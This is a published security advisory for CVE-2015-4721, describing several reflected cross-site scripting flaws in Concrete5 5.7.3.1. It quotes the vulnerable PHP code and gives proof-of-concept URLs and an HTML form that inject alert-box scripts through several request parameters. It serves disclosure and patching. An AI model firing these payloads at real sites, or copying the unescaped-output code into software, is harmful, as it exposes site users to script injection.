concrete5 multiple reflected xss advisory

Edition: 1.0

Last Edit: 24/06/2015

Cassification: Not restricted

Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1

Author: Egidio Romano

Multiple Reflected XSS in Concrete5 version 5.7.3.1

Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/4

Summary

Vulnerabilities Class Cross Site Scripting (XSS)

CVE ID CVE-2015-4721

Remote Yes

Local No

Published June 6, 2015

Updated June 24, 2015

Credit Egidio Romano

Vulnerable Version 5.7.3.1 and probably prior versions

Fixed On 5.7.4

Other References https://hackerone.com/reports/59661

http://blog.mindedsecurity.com/2015/06/multiple-security-issues-discovered-in-concrete5-part1.html

Description

Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because certain user input is being used within the output it generates without validating or encoding it.

Vulnerabilities Details

Following are the reflected XSS vulnerabilities identified:

File: /concrete/views/panels/details/page/versions.php (lines 5-14):

<?php foreach($_REQUEST['cvID'] as $cvID) {

$tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked);

$checked = false;

}

print $ih->tabs($tabs);

foreach($_REQUEST['cvID'] as $cvID) { ?>

https://hackerone.com/reports/59661





<div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php

echo $display?>; height: 100%">

<iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%"

width="100%" src="<?php echo

REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&cID=<?php

echo $_REQUEST['cID']?>" />

User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these:

http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscri

pt%3Ealert%28/XSS/%29%3C/script%3E%3C!--

http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/if

rame%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35):

public function selectUser($fieldName, $uID = false, $javascriptFunc …

$selectedUID = 0;

if (isset($_REQUEST[$fieldName])) {

$selectedUID = $_REQUEST[$fieldName];

} else if ($uID > 0) {

$selectedUID = $uID;

}

$html = '';

$html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary-

selected-item-inner"><strong class="ccm-summary-selected-item-label">';

if ($selectedUID > 0) {

$ui = UserInfo::getByID($selectedUID);

$html .= $ui->getUserName();

}

$html .= '</strong></div>';

$identifier = new \Concrete\Core\Utility\Service\Identifier();

$selector = $identifier->getString(32);

$html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' .

$selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog-

modal="false" dialog-title="' . t('Choose User') . '" href="' .

URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>';

$html .= '<input type="hidden" data-form-user-selector-input="' . $selector

. '" name="' . $fieldName . '" value="' . $selectedUID . '">';/>

User input passed through the “uID” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:

http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscrip

t%3Ealert%28/XSS/%29%3C/script%3E

File: /concrete/elements/group/search.php (lines 4-20):

$searchRequest = $_REQUEST;

$result = Loader::helper('json')->encode($controller->getSearchResultObject()-

>getJSONObject());

$tree = GroupTree::get();

$guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);

$registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);

?>

<style type="text/css">

div[data-search=groups] form.ccm-search-fields {

margin-left: 0px !important;

}

</style>

<div data-search="groups">

<script type="text/template" data-template="search-form">

<form role="form" data-search-form="groups" action="<?php echo

URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm-

search-fields-none">

<input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" />

User input passed through the “filter” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:

http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3

C/script%3E

URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon

User input passed through the “msCountry” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this:

<html>

<body>

<form method="POST"

action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon">

<input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'>

</form>

concrete5 multiple reflected xss advisory

Software